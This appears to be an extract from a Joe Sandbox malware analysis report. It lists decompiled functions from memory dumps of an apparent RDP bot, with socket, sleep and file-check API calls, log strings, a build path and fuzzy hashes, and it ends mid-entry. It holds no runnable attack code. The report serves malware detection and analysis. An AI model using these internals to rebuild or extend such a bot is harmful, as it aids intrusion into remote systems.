[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFDAC121D5E

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: c4a79d48bdbd81d09df92eddbf59bd6ddabe9ce4bd700108570dbed55343cebb
Instruction ID: da17445341665af0081d551592e5f2532c41d8e77883c546f277ea8f09a01001
Opcode Fuzzy Hash: c4a79d48bdbd81d09df92eddbf59bd6ddabe9ce4bd700108570dbed55343cebb
Instruction Fuzzy Hash: CC21F69BB0A91781FA228F16B9647B51651AF147F4F640331DC2C4B7D3CE2CE8068349

Function 00007FFDA55AABF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA55AAC1C
setsockopt.WS2_32 ref: 00007FFDA55AAC48
WSAGetLastError.WS2_32 ref: 00007FFDA55AAC5F
WSAGetLastError.WS2_32 ref: 00007FFDA55AAC84

Strings

tcp_set_timeo, xrefs: 00007FFDA55AAC6F, 00007FFDA55AAC94
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55AAC9B
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55AAC76

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 605e5dfe5316b9558873a97cd0172d1b66de96df917e4ad6386524e0d2362a8b
Instruction ID: 297334256eb1f45a680d9ec563359ad505776e4af82cdd0602a6bf697290c790
Opcode Fuzzy Hash: 605e5dfe5316b9558873a97cd0172d1b66de96df917e4ad6386524e0d2362a8b
Instruction Fuzzy Hash: 4B112978B0954E46F7119F15F8282B66660FF8AB50F004235FA6E83BE2EF7CD5098B04

Function 00007FFDA55D1CE4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA55D1D0C
setsockopt.WS2_32 ref: 00007FFDA55D1D38
WSAGetLastError.WS2_32 ref: 00007FFDA55D1D4F
WSAGetLastError.WS2_32 ref: 00007FFDA55D1D74

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55D1D66
tcp_set_timeo, xrefs: 00007FFDA55D1D5F, 00007FFDA55D1D84
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55D1D8B

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 5924f4c66a108cad5fd152d05af5215a3e148a378faf60fd7981241a8527150a
Instruction ID: fc15e26271b8e92eb4aea11a3f151c5fd420cb06f00bbc9d6da593be96b647f5
Opcode Fuzzy Hash: 5924f4c66a108cad5fd152d05af5215a3e148a378faf60fd7981241a8527150a
Instruction Fuzzy Hash: C011D677B0A58A86E321EF15E4102656660AF8AF44F100232EE5D877A6DF7CD506CB04

Function 00007FFDAC0F3ED4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDAC0F3EFC
setsockopt.WS2_32 ref: 00007FFDAC0F3F28
WSAGetLastError.WS2_32 ref: 00007FFDAC0F3F3F
WSAGetLastError.WS2_32 ref: 00007FFDAC0F3F64

Strings

tcp_set_timeo, xrefs: 00007FFDAC0F3F4F, 00007FFDAC0F3F74
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC0F3F56
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC0F3F7B

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: b07a770b908fa1096c59fb9ac351aa77aea0ab2bcd9760c3c3baf614f33bbee9
Instruction ID: 09cd0a4f7866ccf1d09085a85a232e7c176b4200e1d09a3a17329d6b9fe17232
Opcode Fuzzy Hash: b07a770b908fa1096c59fb9ac351aa77aea0ab2bcd9760c3c3baf614f33bbee9
Instruction Fuzzy Hash: 6111E672B1A54286F3119B2AF8104656660FF887F4F504232E96D83BA2DF7CD5498B08

Function 00007FFDA5575624 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA557564C
setsockopt.WS2_32 ref: 00007FFDA5575678
WSAGetLastError.WS2_32 ref: 00007FFDA557568F
WSAGetLastError.WS2_32 ref: 00007FFDA55756B4

Strings

[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55756CB
tcp_set_timeo, xrefs: 00007FFDA557569F, 00007FFDA55756C4
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA55756A6

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: 748a5e74e8c44ec1b467f4e4ce8b8a3697105510733cea6cee6116d56241620e
Instruction ID: 81e477de3ab55d8922887acaaa674ac59e961fa24be574ff51aada18e67eeb24
Opcode Fuzzy Hash: 748a5e74e8c44ec1b467f4e4ce8b8a3697105510733cea6cee6116d56241620e
Instruction Fuzzy Hash: 6F117839B0E14B86F3119F25E410276A660EF9AF54F400231EA2D837A3CF7CE00ACB08

Function 00007FFDA5BA2604 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDA5BA262C
setsockopt.WS2_32 ref: 00007FFDA5BA2658
WSAGetLastError.WS2_32 ref: 00007FFDA5BA266F
WSAGetLastError.WS2_32 ref: 00007FFDA5BA2694

Strings

tcp_set_timeo, xrefs: 00007FFDA5BA267F, 00007FFDA5BA26A4
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA5BA26AB
[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDA5BA2686

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: aca1936f00035b590d4bf7e1ee5d9f01a821306a4c819533e58a4271cc640142
Instruction ID: 98625ee517b682ee8cd3f34c13046e2051630c041223346c7573dece985e58fe
Opcode Fuzzy Hash: aca1936f00035b590d4bf7e1ee5d9f01a821306a4c819533e58a4271cc640142
Instruction Fuzzy Hash: 92113F70B0954D8BE7109F15E450776A650FF8AF41F004235EA5D83BA6DFBCD105CB08

Function 00007FFDAC121344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDAC12136C
setsockopt.WS2_32 ref: 00007FFDAC121398
WSAGetLastError.WS2_32 ref: 00007FFDAC1213AF
WSAGetLastError.WS2_32 ref: 00007FFDAC1213D4

Strings

[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC1213C6
tcp_set_timeo, xrefs: 00007FFDAC1213BF, 00007FFDAC1213E4
[E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFDAC1213EB

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
API String ID: 1729277954-887953274
Opcode ID: d8d195c563035d49da54626cb804cd32bfd519d752622ef37f2863a34b2ae3a6
Instruction ID: cf726bf13c81265fc527cb66dbac80a43af852525e3f3f5d235090c08801b01d
Opcode Fuzzy Hash: d8d195c563035d49da54626cb804cd32bfd519d752622ef37f2863a34b2ae3a6
Instruction Fuzzy Hash: AD11E6B3B0954286F321AB16F4101AA6660FF887F4F204235E96D83BA6DF7CD5098B09

Function 00007FFDA5BA33CF Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA3401
GetProcessHeap.KERNEL32 ref: 00007FFDA5BA340C
HeapFree.KERNEL32 ref: 00007FFDA5BA341D
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA3441
LeaveCriticalSection.KERNEL32 ref: 00007FFDA5BA3464
EnterCriticalSection.KERNEL32 ref: 00007FFDA5BA34D1

Strings

[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFDA5BA34BE
routine_tx, xrefs: 00007FFDA5BA34B7

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: CriticalSection$EnterHeapLeave$FreeProcess
String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 2539320189-3555278722
Opcode ID: e6631ef8d311fc8e6378ff11d32a685ead571647d0de98cc4c0c206d57fd6105
Instruction ID: 6ffdb05d17b1237cb393f41c2b8ddeb1715c0a8e1484b1a43e7ce31f04f14f3b
Opcode Fuzzy Hash: e6631ef8d311fc8e6378ff11d32a685ead571647d0de98cc4c0c206d57fd6105
Instruction Fuzzy Hash: F6311E31B0AA0A93EA208F11F8A037A73A0FF4AF86F154435DA5D477A6CF7DE5458308

Function 00007FFDAC12C415 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 127sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FFDAC12C448
Sleep.KERNEL32 ref: 00007FFDAC12C4C4

Strings

[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u), xrefs: 00007FFDAC12C547
/, xrefs: 00007FFDAC12C5A7
routine_rx, xrefs: 00007FFDAC12C540, 00007FFDAC12C572
[W] (%s) -> Not a valid packet received(size=%u,suid=%llx), xrefs: 00007FFDAC12C579

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Sleep
String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
API String ID: 3472027048-1600310168
Opcode ID: f2bcfa2bc7fd74ed5834c0d92b34421618f75ae7b5ee43493b71ab7504d8d78a
Instruction ID: b75464675b08dd9e41694266541e1def9c391b86e8b928986ffcf035579ae200
Opcode Fuzzy Hash: f2bcfa2bc7fd74ed5834c0d92b34421618f75ae7b5ee43493b71ab7504d8d78a
Instruction Fuzzy Hash: 3351812BF0E68385FA629B14E4703BA2391AF943F8F504231D66D477D7DE6CE446870A

Function 00007FFDA55D82D7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFDA55D82E0
GetLastError.KERNEL32 ref: 00007FFDA55D8325

Strings

C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55D82FD
fs_path_exists, xrefs: 00007FFDA55D830B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55D8312
(path != NULL), xrefs: 00007FFDA55D8304

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 9fd092705476f9e829ae0a70b8e605f60111ddf5aa69cb2b420b7b88268eb666
Instruction ID: aadd38dbae52b71cd8f7280e0d46b752a0284e8561e16f3163759654bc9c93f2
Opcode Fuzzy Hash: 9fd092705476f9e829ae0a70b8e605f60111ddf5aa69cb2b420b7b88268eb666
Instruction Fuzzy Hash: 6021A65BF0E8CBE2F76ACE99A46037D11519F03B09F604532D90E89393CE6CA885934E

Function 00007FF70CAD6E87 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00007FF70CAD1425), ref: 00007FF70CAD6E90
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF70CAD1425), ref: 00007FF70CAD6ED5

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF70CAD6EC2
fs_path_exists, xrefs: 00007FF70CAD6EBB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF70CAD6EAD
(path != NULL), xrefs: 00007FF70CAD6EB4

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 929e29d4a2ed9aacb65dc4a4a38bd86f9df3ddd46ca05e0a2ff193934f66b942
Instruction ID: dfb481f39f008c35cbc69b588e86cdd95959c925229235e69ce2b3fa7a0d5f38
Opcode Fuzzy Hash: 929e29d4a2ed9aacb65dc4a4a38bd86f9df3ddd46ca05e0a2ff193934f66b942
Instruction Fuzzy Hash: F52193D0E2C98382FB646658BC84B7DD2625F54349FE44932F10F8A5D8CF2CEE8552A2

Function 00007FFDAC1256C7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFDAC1256D0
GetLastError.KERNEL32 ref: 00007FFDAC125715

Strings

fs_path_exists, xrefs: 00007FFDAC1256FB
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDAC1256ED
(path != NULL), xrefs: 00007FFDAC1256F4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDAC125702

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-4111913120
Opcode ID: 5ed0d067b6df4f2e07e290aeffdb71b76f8ca25bfc64475e56e4b5cd1b69421c
Instruction ID: c60dfa39a159541f45c4a51d6009be6759bd3ac35001429b0873e00aaa8c640b
Opcode Fuzzy Hash: 5ed0d067b6df4f2e07e290aeffdb71b76f8ca25bfc64475e56e4b5cd1b69421c
Instruction Fuzzy Hash: 8A21B65AF4F543C2FF668B5894E4B7922409F013FDFA04532D54E8A392DE1CE886A64B

Function 00007FFDA55AB4BA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFDA55AB4E2
WSAGetLastError.WS2_32 ref: 00007FFDA55AB4FC

Strings

[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA55AB51D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFDA55AB535
tcp_recv, xrefs: 00007FFDA55AB516, 00007FFDA55AB52E, 00007FFDA55AB553
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDA55AB55A

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 0a1b34fae7a4759d5745584ff93980657748c3b854fb101361829796ca049778
Instruction ID: 50c8f78c09c9a500cd8073f580ba28f634d5a40bcdb9437ff9d4c74781fed99f
Opcode Fuzzy Hash: 0a1b34fae7a4759d5745584ff93980657748c3b854fb101361829796ca049778
Instruction Fuzzy Hash: 63118E28B0E50F82EA275F25A8687B412427F07FB0F810730DA2D477E3EE5DA5068349

Function 00007FFDA55D25AA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFDA55D25D2
WSAGetLastError.WS2_32 ref: 00007FFDA55D25EC

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDA55D264A
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFDA55D2625
tcp_recv, xrefs: 00007FFDA55D2606, 00007FFDA55D261E, 00007FFDA55D2643
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA55D260D

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
